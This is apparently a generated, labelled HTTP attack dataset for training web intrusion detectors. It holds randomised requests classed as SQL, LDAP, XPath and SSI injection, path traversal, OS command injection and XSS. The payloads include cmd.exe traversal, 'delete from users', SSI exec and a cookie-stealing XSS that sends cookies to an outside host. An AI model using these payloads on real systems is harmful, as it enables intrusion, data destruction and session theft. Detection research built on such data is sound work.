Cookie: aornaogf9Azh=icieTlnlibm8Lfarpopenel;xDi=s<NtnowgetEhwp->cmddropprocessing-instruction1gunionieval;lmhefeisrAith=selectsergnaymqa 
Cookie2: $Version="1"
Date: Sun, 07 Dec 08 19:21:50 CET
ETag: W/"EqD@suDSZ-6kzkU3OMMy"
Expect: 100-continue
From: apYenet@6eifconf.ch
If-Modified-Since: Mon, 22 Oct 07 01:31:11 UTC
If-Unmodified-Since: Wed, 02 Apr 08 16:11:58 CET
If-Match: *
If-None-Match: "RiwBm4dPQc@cLxf976"
If-Range: *
Max-Forwards: 2
MIME-Version: 2.4
Pragma: eh=AynaU
Proxy-Authorization: Basic M3dvaWU6MHk0Mms=
Authorization: Basic ZXk5ZW86b3lhb3J1
Range: 02-,96-
Referer: http://9pit.biz/hl4eozst.tar
TE: deflate
Trailer: Upgrade
User-Agent: ffmz/5.6
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3896x417
Via: FTP/2.0 66.8.6.29, 4.6 www.hs3sAuVn.png:88262, 8.8 178.68.85.184
Transfer-Encoding: gzip
Upgrade: oonp/1.0
Warning: 911 148.86.166.125:8448 "aOi1" 
X-Serial-Number: 599135486061
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39422
Start - Id: 43865
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.eyte.cz
Connection: keep-alive
Accept: text/*;q=0.0, application/*;q=0.3, video/*
Accept-Charset: iso-2022-kr
Accept-Encoding: 
Accept-Language: oh8lBs-bti8t;q=0.2, avSsekh-oa9
Cache-Control: no-cache
Client-ip: 134.7.129.167
Cookie: deahOtuIelL=sngmhdr;n2d=efs.Ho.frOTK;rensaytiinyhaga=em4epsTcufRae;h2eUimhkeh=sa%I;relerBkczmou=onl;b09EY292=5Dehtaccesf:md
Cookie2: $Version="8"
Date: Sun, 22 Feb 04 09:59:22 UTC
ETag: "dGEC@BIj22_xTSaE@"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Mon, 22 May 06 14:23:51 GMT
If-Unmodified-Since: Sun, 19 Apr 09 07:36:23 CET
If-Match: "vmhs5Zn2eM-8P2y"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="tRstaerb"
Authorization: Basic aGhlaEdhaDpoN1RzYXJ0ZQ==
Range: 91796-,027282-114595
Referer: /9o7m/ri1qhEh.mpg
TE: trailers
Trailer: User-Agent
User-Agent: yeraiqa (yHojBq)
UA-CPU: Sparc
UA-Disp: 191,2261,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: gZ1naf/1.2 www.whufar.js
Transfer-Encoding: 1qsm; vrjcoda9=adoeErc7
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 271 62.138.196.100 "8z8l8ou" "Tue, 21 Feb 06 05:57:12 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43865
Start - Id: 45969
class: PathTransversal
GET /t_/nsZ@M7gBGJFK8X/mhW4hEG8PhIcq/noSTQ3xJChm5HOC0.E/bslrteaNmrio4il/tUQTAHY9gsKkvT4nFeHA/iCufnkAvTW/ui49fgsn.tiff?yp5g@-k.=acceptT9ee&2kiframevarVuN=hsxtbst&f5cg=ohttpbrt&fsTot=e6poaftq6toh8b&includeFnlU_GoWall.=22386059&xnghhutdcho=hPLcgJcXdUR&ier4sm=lTyehfuo8ngy&Eyon8oTiseAt=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini HTTP/1.0
Host: www.aepa.cz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: a13-vdur
Cache-Control: max-stale
Client-ip: 12.220.22.8
Date: Tue, 29 Nov 05 07:19:17 GMT
ETag: "9s2FpruqLqSbT0QBEI"
From: Eypam@yBe9mr2i.cz
If-Modified-Since: Wed, 24 May 06 18:23:31 UTC
MIME-Version: 6.4
Pragma: obtlths=nch
Referer: http://rmhln.uk/nfeteONy/ceacal/aitr8.txt
Trailer: Authorization
User-Agent: Mozilla/6.8 (Windows; U; WinNT 9.8; ei-hh; rv:4.5.2) Gecko/87934186
UA-Color: color8
Via: HTTP/4.9 213.54.44.91
Upgrade: dlop/1.5, rol3i/5.4
X-Forwarded-For: 54.78.195.221

null

End - Id: 45969
Start - Id: 35823
class: XPathInjection
GET /eE/dRHzFedaWTpn/dnf9/DNMqbgsoundPsU/RaE7wrrrq/pfi7nlhb4lsairarilai/eF1hwtnT2FTO/ovzgcTKQ8s0EHiu/lzbx5n/7tmp/stenmzoptEolbrireb.jsp?5nsesedqdoB=tadNd%2FiUo%2Fee%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D769%5D++or+++++%27tayhi%27%3D++%27 HTTP/1.1
Host: www.ciein.ch
Connection: close
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=7
Client-ip: 19.116.224.235
Cookie: o7zeida1rmsonle=ts3edH1cisfseSe5te;vEGcn=dassntoArUiFe;dsClr=wglrlt4d8awfnr5hae;2c3oIgrZora=pd$o;nc6=bZ00l
Cookie2: $Version="2"
Date: Tue, 28 Oct 08 05:04:10 CET
ETag: W/"lpsbtCm1cdq5sF5ek"
Expect: 100-continue
From: a2frd@mttrrPoVI.gov
If-Modified-Since: Sun, 16 Jan 05 02:53:56 GMT
If-Unmodified-Since: Mon, 27 Aug 07 21:33:03 UTC
If-Match: "OZ1Md3zff@LVMyik2"
If-None-Match: "xlk8HcX8sPbfCx7"
If-Range: Thu, 08 May 08 14:51:39 GMT
Max-Forwards: 2251
MIME-Version: 2.2
Pragma: ijnen=hi
Proxy-Authorization: luLc Okt8e=3llo
Authorization: NTLM bGplUmlzMkU5QWhzdGVjc2lkczBmb2Vjb1VqdHFhc1MwZW5wdA==
Range: 205-0247
Referer: /tphGo/xqonl/raHto.gif
TE: trailers,trailers
Trailer: Via
User-Agent: o2hwy6irejo
UA-CPU: x86
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: 6.0 www.aygtea5.png
Transfer-Encoding: compress
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 351 24.73.41.38:3 "Asogrdto" 
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 62972291005
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35823
Start - Id: 44244
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.io3hbEsi3.de
Connection: close
Accept: text/plain;q=0.6, application/zip;q=0.0, application/*;q=0.0
Accept-Charset: *
Accept-Encoding: deflate;q=0.3, compress;q=0.6, identity, gzip;q=0.5
Accept-Language: easam-arrElas;q=0.9, doeeat-gOry2ms, ot2-azl;q=0.9, s-loig;q=0.3
Cache-Control: no-store
Client-ip: 157.29.164.15
Cookie: Hdympite=seeHrea0tY;geCmte=fet6 oi;6SaurtedzisEcte=88862;6.gTlBufO=n6  $lntttctmp;rRF3bir3sspeane=tfttiswherec;acsias=n1Jkty
Cookie2: $Version="9"
Date: Thu, 21 May 09 15:12:33 CET
ETag: "-8T0kbq_jilGiD3"
Expect: ohder2=drntNg
From: ided@udhoes.uk
If-Modified-Since: Wed, 29 Sep 04 05:42:54 GMT
If-Unmodified-Since: Thu, 18 Aug 05 02:20:44 GMT
If-Match: *
If-None-Match: "nHqelmTAXyPEbWth"
If-Range: *
Max-Forwards: 3
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Basic aHRybng6ZWxMYQ==
Authorization: Digest nonce
Range: 9-
Referer: http://www.hEiobz.ch/tlellr/oaajhe/rmbsebb/etehctS.mspx
TE: trailers
Trailer: Accept
User-Agent: Mozilla/9.3 (Machintosh; U; PPC 7.2; os-Og; rv:9.8.4) Gecko/53213239
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 352x848
Via: HTTP/4.1 104.245.120.13, HTTP/2.1 245.174.241.3:8
Transfer-Encoding: identity
Upgrade: hrl/2.7, tuad/2.6, kea/2.0, vowi/4.8
Warning: 992 www.i1e3itee.jpg "capc8tz" 
X-Forwarded-For: 242.235.213.130
X-Serial-Number: 87791101469123011682
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44244
Start - Id: 38425
class: LdapInjection
GET /tuiOer8nasroc16wnlor/ocvIq8T20i.BC8V/cz8gr_1Rprocessing-instructionexecd/tu8o7uessRhi2/dus-ET0Zvf5lriiPAb9.jpeg?yalclorooo=%29++++%28+++%7C%285b%3DRe3n*%29 HTTP/1.0
Host: www.laenryrgs.cz
Connection: close
Accept: audio/*, video/*;q=0.1
Accept-Charset: x-mac-roman;q=0.0, hz-gb-2312;q=0.9
Accept-Encoding: 
Accept-Language: tN-hq8;q=0.6
Cache-Control: ueoaitH=uents
Client-ip: 169.13.143.24
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="88"
Date: Sun, 31 Jul 05 04:12:08 GMT
ETag: "caysJ7Ou24aNUTvQ"
Expect: 100-continue
From: Oslon0u@r8tdhoemoo.org
If-Modified-Since: Fri, 31 Jul 09 23:37:31 CET
If-Unmodified-Since: Tue, 28 Sep 04 24:07:01 GMT
If-Match: *
If-None-Match: "sWuKOF4L2kMkyX9MK"
If-Range: Sun, 23 Oct 05 07:51:53 UTC
Max-Forwards: 63
MIME-Version: 2.2
Pragma: s='ecco'
Proxy-Authorization: Digest cnonce="twseli3"
Authorization: NTLM Z0Ruc3M4YW9peXlidGVxbmVyMjY5MGhzdHdlRWVvdEFjdHRt
Range: -03,38-
Referer: /hnytho.mpg
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.9 (Windows; U; Win 9x 2.8; 0N-o5; rv:1.4.2) Gecko/86958080
UA-CPU: x86
UA-Disp: 471,4327,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0696x1408
Via: soon/5.4 64.89.237.87
Transfer-Encoding: deflate
Upgrade: lig/4.2, roeri/4.4
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 180.11.72.245
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38425
Start - Id: 47277
class: XSS
GET /ioOnHOzOnZ1V4AMiFlp3/rRrC6gtQeBJG1B/e4etmiehel1ta2ts/u5ehaVmmx/9tnycet4wpiOoga/yLSdFXqAxbg0y4jsX/aYY-sRJ/cencbdmaoghatshrlao.htm?fN2nhc93erw=9454&vo=%24ooald&pFsaTy2sceej8c=%3Cimg+++++src++++%3D++%22+++++nslegees+%3E++++%22+++onmouseover++++%3D%22++++%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.chvechro.com%2Fcgi-bin%2Forontaenri.cgi%27%2Bdocument.cookie%29%3B%5D%22++++%3E&ycEs7oronK2mT=z7s&5esbiytuieS=htaccesnrh&iet=%3A6c%25u11ecdewindow.openabd HTTP/1.0
Host: www.citse.net
Connection: close
Accept: audio/x-wav, audio/x-wav;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: 3iye7tqs-i;q=0.6, lsi05h-ceYhsth, N-0Tsd;q=0.1
Cache-Control: max-age=1384
Client-ip: 48.5.47.91
Cookie: hjesnneac6=965106;is=7669071717;ihitD2zeaoyf7ea=uln?;sr=uShe2ttHNseso;5HfeoiEmdumpn1e=84
Cookie2: $Version="73"
Date: Thu, 22 Oct 09 08:36:01 CET
ETag: W/"rXrXQIss2Diq7_2DXw"
Expect: eplnt
From: eA3ce@Sdytnl.st
If-Modified-Since: Fri, 02 Jul 04 16:43:12 GMT
If-Unmodified-Since: Thu, 12 Jul 07 06:56:10 GMT
If-Match: "jF_P0iLzYK_9X3XGzEyq"
If-None-Match: *
If-Range: Mon, 08 Mar 10 21:02:04 GMT
Max-Forwards: 98
MIME-Version: 3.6
Pragma: lmh='i'
Proxy-Authorization: NTLM YWFmOHNyYThLaGRuZGhpbTRlRWVybmU5bnJGNWFveGNwbDli
Authorization: Digest realm
Range: 3-25949,-0524
Referer: /ecm7ade/Kanb/rTt9r.asmx
TE: trailers,deflate;q=0.7,chunked;q=0.0
Trailer: Trailer
User-Agent: tzR@-x49 http://www.ynnEj.biz
UA-CPU: x86
UA-Disp: 3073,5344,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 581x8741
Via: 2.0 87.155.190.119, 7.7 www.eioste5.css:2, HTTP/5.9 www.ipSxtt.png:9
Transfer-Encoding: compress
Upgrade: enoe/1.7, jmbut/1.3, oeda/2.9, euyr2/9.2, lnTo/7.5
Warning: 431 www.otzeN.jpeg "hOuJne9h" "Sun, 21 Feb 10 07:26:32 UTC"
X-Forwarded-For: 228.59.131.84
X-Serial-Number: 972806638968754
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47277
Start - Id: 42814
class: OsCommanding
PUT /r-EuA5e_R4i9mezXJ1kE.html? HTTP/1.1
Content-Length: 32
Content-Language: entvoe
Content-Encoding: identity
Content-Location: /ttpt6c.sh
Content-MD5: aWFUSnVpb3Rwa1JlYWQxUA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 14 Apr 05 18:52:51 UTC
Last-Modified: Tue, 21 Sep 04 11:56:13 CET
Host: 99.202.67.65:41719
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: x-mac-japanese;q=0.6
Accept-Encoding: identity;q=0.9, compress, compress;q=0.2
Accept-Language: Xeto7a-e;q=0.9, trceoj-u;q=0.3, tqer8-trilXf
Cache-Control: min-fresh=6773
Client-ip: 193.55.233.166
Date: Thu, 02 Aug 07 02:41:59 GMT
If-Modified-Since: Sun, 03 Jul 05 12:05:35 UTC
If-Unmodified-Since: Tue, 08 Jan 08 19:21:21 UTC
If-None-Match: *
If-Range: *
Max-Forwards: 6656
Proxy-Authorization: 2sefaD vsgstl=elgn
Authorization: Basic RW9zek46c2l0bm9k
Referer: /SoriE/usyu/rna5rB/namekemp.asmx
User-Agent: Mozilla/0.5 (X11; U; Open BSD i586 7.3; im-db; rv:9.1.2) Gecko/30993446
UA-Pixels: 0367x479
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

.6FXx3U=212.218.179.201   |dir

End - Id: 42814
Start - Id: 41942
class: SqlInjection
GET /aMaOqmdq/hxercnad4hymuuoi8/lm2egil5Ifbea4o/rIieq/pJY/1Y_t_Y/euajBdGoDbDYHUBSn4m6/42l0pbBd1u.htm?Och=6&eai8=rlinksrhttpsn%24aste%26hhl3ue&93Aj=%27%29%3B+++++delete+++++from++++users%3B+++++commit%3B++dummy%28+++%27 HTTP/1.0
Host: 85.222.237.137:3
Connection: ldwu
Accept: */*
Accept-Charset: windows-1251, us-ascii, x-mac-icelandic, x-mac-turkish
Accept-Encoding: 
Accept-Language: eEgmt8a-gvstd, es4ancG-mOesa7, nDrteanf-aSo8Iu, 6Iezoa-n8yba2sA;q=0.2, qari-a
Cache-Control: no-transform
Client-ip: 148.203.206.38
Cookie: a.iIVI=dprm]einsert;ha=snjr - hossauIkuvbscript a;emo2hmov0sl1sr=43929893;U8kd=sehaoal3Ord0hha;irIh7=997;nr9tf=1184048
Cookie2: $Version="8"
Date: Sun, 07 Oct 07 21:35:53 UTC
ETag: "STLwztEysXjjA5_mC8"
Expect: 100-continue
From: erpnsemv@5tAwdogn.st
If-Modified-Since: Tue, 13 Mar 07 17:49:21 GMT
If-Unmodified-Since: Tue, 08 Apr 08 12:28:05 CET
If-Match: *
If-None-Match: "mt-udyq80kMC2wpVQ"
If-Range: Wed, 13 May 09 24:35:46 CET
Max-Forwards: 8172
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: aies sesl=fkaciu
Authorization: Basic dG1zRWhzOndCQWxsN3Q=
Range: 55660-
Referer: http://eahoE.com/a16ese5/stl7203/l4ee.php4
TE: trailers,trailers,chunked;q=0.0
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.5 (Windows; U; Win 9x 2.5; en-at; rv:2.6.6) Gecko/81514786
UA-CPU: x86
UA-Disp: 4298,556,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 724x022
Via: 3.6 www.tgEj.jpg, FTP/5.6 www.obacro2e.tiff
Transfer-Encoding: identity
Upgrade: imn/2.9
Warning: 985 75.9.47.68 "9pnu" "Mon, 31 May 04 18:02:50 CET"
X-Forwarded-For: 79.193.225.128
X-Serial-Number: 79709150
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41942
Start - Id: 37879
class: LdapInjection
GET /LSQxtermPPsWB/Tetaaw5d4heSaiiilr/oJ-g5m9YAwQ5/naTEehftpd/wJ/-x1.cju/JdS.js?eechoeMS1=89&iqoodgt5it=n+y&rDirucd1Ur5N=631I%29%28++++%7C++++%28254%3D*%29&rSaAaeins3gasnn=eroda&nyiTs=gR+e8ktd8Ie HTTP/1.1
Host: www.vZvnim.biz
Connection: keep-alive
Accept: text/*
Accept-Charset: x-mac-ce;q=0.6, x-mac-korean;q=0.9, isiri-3342
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 243.107.176.204
Cookie: cvioadfompod=tag6iua4;fseoWPEjdbuwer=ip;hk=49413844;W3telneth=snodusr;BIWy8sFselectaJ=htx;sfrh=lintazeld9aiden
Cookie2: $Version="4"
Date: Mon, 14 Jul 08 01:16:46 UTC
ETag: W/"0TSBrKN@19qGWxFKmS7"
Expect: ooauyOdi
From: ftCe@ttlwnsel.it
If-Modified-Since: Wed, 14 Apr 10 14:30:35 CET
If-Unmodified-Since: Wed, 21 Feb 07 06:54:15 GMT
If-Match: "j03sBA-skXanwNiI"
If-None-Match: "M9sH0o2P18l28ICX"
If-Range: Sun, 24 Jan 10 11:52:54 GMT
Max-Forwards: 09
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic ZXNtaGFTOmF4dWVl
Authorization: NTLM b3RoNm50aWVMbXFvM3JkaG82cmQzc3VvZWh2T2luejBlZWFkZQ==
Range: 89-,46-035533,8-609
Referer: /m1nuoss/urwcss.conf
TE: chunked;q=0.4
Trailer: If-Modified-Since
User-Agent: Mozilla/5.3 (compatible; Konqueror/0.4; Linux i586; 1o8w; 3g9gqwp7ho; stoe1)
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: xEchh/7.3 59.63.172.159:519, 0.0 www.oaeRtn.jpeg, HTTP/3.5 76.169.186.109
Transfer-Encoding: compress
Upgrade: 82r/8.3, ehi/8.7
Warning: 941 www.iehcba.gif:913 "elrrSd" 
X-Forwarded-For: 32.94.96.206
X-Serial-Number: 300384
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37879
Start - Id: 40090
class: SSI
GET /gNCOadminnull0s/pOkPe/eost/ahxsawsttsVhbl/mFTT2IqFXxjGtHhLE4m/0TSd_q/otrbSssiacexEa1/mmnhdflcyee9ors/rXtt3sBFxRNboaiZYZUP/QFJVmCj1JdeleteKWD/uXYRQNUnph-cjAKDnullH.asmx?yTmant8ty=%3C%21+++++%23%3C%21--%23exec+cmd%3D%22id%22--%3E&kJR-=diva&6i1sQBIbgsoundiQ=l9Adn&sHrisoqe7=sJ5o2yW HTTP/1.1
Host: 209.115.36.19
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 139.170.207.9
Cookie: tre9a=nhy
Cookie2: $Version="41"
Date: Thu, 21 Oct 04 03:18:31 CET
ETag: W/"_Xa4edX9KDjWHxZa1Le"
Expect: tslD=cua4;iiit=tpIAwosc
From: eolu8j@aioa.fr
If-Modified-Since: Mon, 10 Oct 05 20:44:53 GMT
If-Unmodified-Since: Fri, 29 Jan 10 11:10:10 CET
If-Match: *
If-None-Match: "fk8cu4sMfGdoBgsFDG"
If-Range: Sat, 25 Apr 09 22:13:54 CET
Max-Forwards: 2
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: mshe trCer=de1seo
Authorization: eke5at o9mi=ikHts9eh
Range: 1646-745
Referer: /eyybesp/8mpe89d/ihh8e9/tltadPo.mpeg
TE: deflate;q=0.8,chunked;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.8 (compatible; pzuotuu; Open BSD i386; tsehit; Uyioianor; ewOotaoi)
UA-CPU: MIPS
UA-Disp: 952,4343,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0944x596
Via: HTTP/9.4 232.225.23.220, 4.5 156.113.93.118:2288, 6.6 www.gutnrU.tiff:0
Transfer-Encoding: identity
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 972 46.77.187.29 "samietonOs6ar8c" 
X-Forwarded-For: 64.201.70.142
X-Serial-Number: 606454137105
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 40090
Start - Id: 49018
class: XPathInjection
GET /qgetIv/tdgnOrtr5tlfenaspie5/tNr/3bjeaiss/qfc3uA/z9ozP3/tdc6xd@L7--QRz2h8r4/f7U6eR7LS8_n0.css?heldt5roe9=17801&heojzaMksydtn=rdoentccleTiGNoIsw&r2ehfdomi0air=6euljla9eRl8i&9otptio03rle=52846011&l35GPBa=seCi&O1vbscriptC=waeTroDie6seos&nSdos92cxywst=reiey%27%5D++%7C++P++++%7C+++++%2F%2Fuser%5B+++name%2Ftext%28+%29%3D++++%27lot2&t2=tw1edms&gHtlDveye=82029861 HTTP/1.1
Host: www.saeemkiWt.net
Connection: keep-alive
Accept: text/*;q=0.4, text/xml;q=0.3, video/quicktime
Accept-Charset: *;q=0.2
Accept-Encoding: compress, gzip
Accept-Language: e-s7druao;q=0.6, h9uee-rlro, nCeo3hr-ngAts, teoeh-uet;q=0.4
Cache-Control: min-fresh=57
Client-ip: 5.173.173.39
Cookie: 7OVp8JXstdinn1=ypfssp3go;3iudtzi2nm8=rmwch5oozbgpzo;tir8ttsue3tne=357;1ceemateegizx8=8838;jeholwmcalumoi=jtAnnrsbitsreae;qgtebtpeSu=rr
Cookie2: $Version="4"
Date: Sat, 18 Feb 06 16:47:25 GMT
ETag: W/"vtLL5g2oqsTTF5CcmnU"
Expect: erftrsq=eavsowes
From: mn1eatis@ye8qeam0O8.be
If-Modified-Since: Wed, 24 Nov 04 11:06:09 GMT
If-Unmodified-Since: Wed, 16 Jun 04 17:35:40 CET
If-Match: "@1be1Cv0FXPDVRArz"
If-None-Match: *
If-Range: Sun, 20 Aug 06 13:14:14 CET
Max-Forwards: 70
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest username="ehcteu"
Authorization: NTLM ZG5laXdldHBoRHB5YWQzZU0wd2VsbWV0dE5iaWQ1TFo=
Range: -31
Referer: http://t22s.net/tLiMn04/asco/toha.msf
TE: chunked;q=0.7,chunked
Trailer: Host
User-Agent: obd2dsdnnct3usiLek
UA-CPU: 68000
UA-Disp: 119,4854,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1840x9062
Via: 9.9 www.5somugrc.jpg:60
Transfer-Encoding: ams4oY; 9Rqemar=5rAt7y5F
Upgrade: l7T/6.8, egesr/9.6, aotEhh/5.3, leolo/7.4
Warning: 720 242.255.165.22 "tOitnuAIte3" "Sun, 01 Apr 07 23:33:20 GMT"
X-Forwarded-For: 216.15.10.143
X-Serial-Number: 544350626543951868
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49018
Start - Id: 35228
class: SqlInjection
GET /-3yeval.Vu/ieBuK.shtml?hV3smWmX=g&uhqayse9mue=OrigText%27OR%27sr7%27%3D++++%27nrlit%27&o0neuavEhjgt=5572261667 HTTP/1.1
Host: 158.253.181.15
Connection: keep-alive
Accept: audio/*;q=0.2, text/*, application/postscript
Accept-Charset: utf-8, koi8;q=0.9, iso-8859-4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 77.106.13.151
Cookie: sgv9d6cmnd=swci4syii;dhmooo=9319656;bwstcno=exi
Cookie2: $Version="2"
Date: Sun, 31 Jan 10 02:59:35 CET
ETag: W/"bFb127kl2ale7r@.kL9"
Expect: 100-continue
From: oeeetot@ecjsbsx.org
If-Modified-Since: Sun, 12 Dec 04 07:31:08 GMT
If-Unmodified-Since: Sun, 12 Apr 09 02:40:15 GMT
If-Match: "i22JZk1gkOPbluxUnaU"
If-None-Match: "U.loG0p4aG@ooqC"
If-Range: "YQ9-Df768EBLQVq"
Max-Forwards: 074
MIME-Version: 1.4
Pragma: sbted='gain'
Proxy-Authorization: NTLM ckxzMmNvTjBuaGVjb2FldGlzYWFOZGFhMDdtbnNuOXNl
Authorization: Ng2eEW jwwi2aA=tNdexeg
Range: -2,109-7
Referer: http://bsaua.org/e1wtcNb3/5pebote/iteosi/sclcu5cr.cgi
TE: chunked,chunked
Trailer: Accept-Language
User-Agent: Mozilla/3.6 (Machintosh; U; PPC 8.9; th-hr; rv:9.8.6) Gecko/98988284
UA-CPU: Sparc
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: 4.1 62.88.136.193:74, 3.6 228.185.98.139, wee/3.2 www.aw0eh.htm
Transfer-Encoding: deflate
Upgrade: doyt/0.4, bE3yw/1.4, otunr5/6.9, 62V/0.3, trd9ad/7.6
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 124.235.20.134
X-Serial-Number: 735496334921593
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35228
Start - Id: 40694
class: SSI
GET /morocwlmnw/tBXFQ-T0rpklpx4xH/sgTJs1/yqeteutr4iss1sncb8So/ygCWdsw9uxJyfi3.jpg?EAfhsi=0351477&nzvnneoo=%3C%21--+%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++++--%3E&0flSao0reh7=Zs0ef%24%2Brtl%2B2qn HTTP/1.1
Host: www.pbnW7.gov:80
Connection: keep-alive
Accept: video/mpeg, text/*;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.5, compress;q=0.1, compress;q=0.1, gzip, gzip;q=0.8
Accept-Language: *
Cache-Control: no-store
Cookie: me=68184362;QHY0.YdnetcatS=l2LS;w6VdmzYvqM=748;Atoo9iyhtp2ei=er7oss2mne
Cookie2: $Version="041"
Date: Wed, 04 May 05 19:36:44 GMT
If-Modified-Since: Sun, 23 Dec 07 11:33:44 CET
If-Match: "Btf.vOUaT5wi.Vvujo"
Max-Forwards: 6799
Pragma: snesitdm=stscl
Proxy-Authorization: Digest nonce
Authorization: xhde oNinLln=faein7
Referer: http://srStom.gov/5teArone/ctmnoGt/osdpetnt/aoG7inan.tiff
User-Agent: Mozilla/3.4 (Windows; U; Win98 5.7; ot-b9; rv:3.6.9) Gecko/25392033
Transfer-Encoding: s5chl
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40694
Start - Id: 45377
class: PathTransversal
POST /fST6AoiK0Pjtpbq9ciP/ltiL4nnftaEtkard/000hbAfxD__iAcj/-winntd/aemmgh86gNGQ7S/sBQqfxXp7idi/t9bxT/ZscriptT9.jpg? HTTP/1.0
Content-Length: 341
Content-Language: es6tf
Content-Encoding: gzip
Content-Location: http://nt34Tg.be/rmmnos/jisq.avi
Content-MD5: YXQ5b2llZW9ib1RmZGRvcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 25 Apr 08 18:22:50 CET
Last-Modified: Mon, 08 May 06 13:26:31 GMT
Host: 140.224.174.15:04421
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: cp-932;q=0.3
Accept-Encoding: identity;q=0.1
Accept-Language: MpNmrlA-mhSn0og, 0re-es;q=0.5, imbpowr-eXotf4;q=0.1, naird-yti, faDdle-e
Cache-Control: hieitn='ygbiwil'
Client-ip: 219.120.83.225
Cookie: cehjohyhOooh=7;Bha=eb9Q;diEn=928;rKGjoh=oepositionc;kork8Negoh0l=$ztl
Cookie2: $Version="96"
Date: Fri, 08 May 09 20:05:06 CET
ETag: "BVmpJ8txQ8q.HBmdrzQB"
Expect: 100-continue
From: R3loelSr@cnorhewh.st
If-Modified-Since: Sun, 13 Nov 05 09:20:57 UTC
If-Unmodified-Since: Thu, 19 Jun 08 02:02:44 CET
If-Match: "8bl_RjSClDPqSdpag"
If-None-Match: *
If-Range: Sun, 19 Sep 04 02:46:35 UTC
Max-Forwards: 81
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM cGVsYW9ldGxJMjRyb21pc2lpYXhpbWxyZG5lZHVsc2VpN2FlSGM=
Authorization: iStPne e4iunrar=se0tuehv
